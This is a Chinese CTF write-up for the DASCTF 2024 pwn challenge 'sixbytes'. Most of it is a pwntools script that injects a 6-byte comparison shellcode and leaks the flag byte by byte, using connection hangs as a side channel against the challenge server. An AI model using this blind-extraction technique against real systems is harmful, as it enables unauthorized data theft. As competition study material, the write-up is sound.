DASCTF 2024金秋十月|秋意浓,战火燃,码上见真章

PWN

  • sixbytes
  • usersys (复现)
  • ChromeLogger (复现)

sixbytes

6个字节的shellcode

最开始爆不出来, 后面调试了下可以发现是因为idx为0和不为0的时候跳转的循环地址不同, 直接跳过flag头开爆

#!/usr/bin/env python3

# -*-coding:utf-8 -*-

from pwn import*

from ctypes import *

from LibcSearcher import *



# Run configuration.
#   io_ch  : 1 -> connect to url:port, otherwise spawn `filename` locally
#   de_bug : 1 -> attach gdb to the local process
# Note that the __main__ loop further down re-opens `io` with
# remote(url, port) on every probe regardless of io_ch.
io_ch = 0
de_bug = 0
url, port = 'node5.buuoj.cn', 25036
arch = 'amd64'
filename = './pwn'
context(log_level='debug', os='linux', arch=arch)
context.terminal = ['tmux', 'splitw', '-h']

# Initial connection / process. The __main__ loop below rebinds `io` with
# remote(url, port) before any probe is sent, so the process started here
# is never actually driven by this script.
if io_ch == 1:
    io = remote(url, port)
else:
    # local run; the original kept a qemu-user variant around:
    #   io = process(["qemu-aarch64-static", "-g", "1234", "./pwn"])
    io = process(filename)
    if de_bug == 1:
        gdb.attach(io)

if filename:
    elf = ELF(filename)
    # libc = ELF('./libc.so.6')

# - - - - - - - - - - - - - #

# Thin I/O helpers over the module-level `io`. They look `io` up at call
# time, so they always talk to whatever connection is current.
def s(content):
    return io.send(content)


def sl(content):
    return io.sendline(content)


def sa(content, send):
    return io.sendafter(content, send)


def sla(content, send):
    return io.sendlineafter(content, send)


def rc(number):
    return io.recv(number)


def ru(content):
    return io.recvuntil(content)


def rcg():
    # read a 6-byte leak and zero-extend it to a little-endian u64
    return u64(rc(6).ljust(8, b'\x00'))

# Host libc handle, seeded with srand(0). Nothing in the code shown here
# calls into it; it is part of the author's template.
r_l = CDLL('/lib/x86_64-linux-gnu/libc.so.6')
r_l.srand(0)

# - - - - - - - - - - - - - #

# 6-byte probe, filled in and assembled per guess by pwn_exp(i, j):
#   cmp byte ptr [rdi+i], j   compares the byte at offset i with the guess
#   ja $-0x4                  jumps back to the cmp (4 bytes long with a
#                             byte displacement) while the byte is above
#                             the guess (unsigned), so the target spins;
#                             otherwise execution falls through.
# NOTE(review): assumes rdi points at the flag buffer when the probe runs —
# inferred from the writeup, not visible here. The -0x4 target is only
# correct while the displacement i still encodes as a single byte.
shellcode = '''

cmp byte ptr [rdi+{}],{}

ja $-0x4

'''

# - - - - - - - - - - - - - #



# - - - - - - - - - - - - - #

def pwn_exp(i, j):
    """Send the 6-byte probe that compares flag byte *i* with value *j*.

    The probe is produced by formatting the module-level ``shellcode``
    template, assembling it, and sending it through ``sl`` over the
    current global connection ``io``.
    """
    print('PWN')
    probe = asm(shellcode.format(i, j))
    sl(probe)

if __name__=="__main__":

    flag = ''

    idx = 5

    l = 0x20

    r = 0x80

    while True:

        sleep(0.5)

        mid = (l + r) // 2

        print(l,mid,r)

        io=remote(url,port)

        try:

            pwn_exp(idx, mid)

            io.recvuntil('\n',timeout=1)

            #小于

            l = mid+1

            print("DDD")

            io.close()

        except:

            #等于大于

            r = mid

            print("EEE")

            io.close()

        if l == r:

            flag += chr(l)

            idx += 1

            if chr(l) == '}':

                print(flag)

                exit()

            l = 0x20

            r = 0x80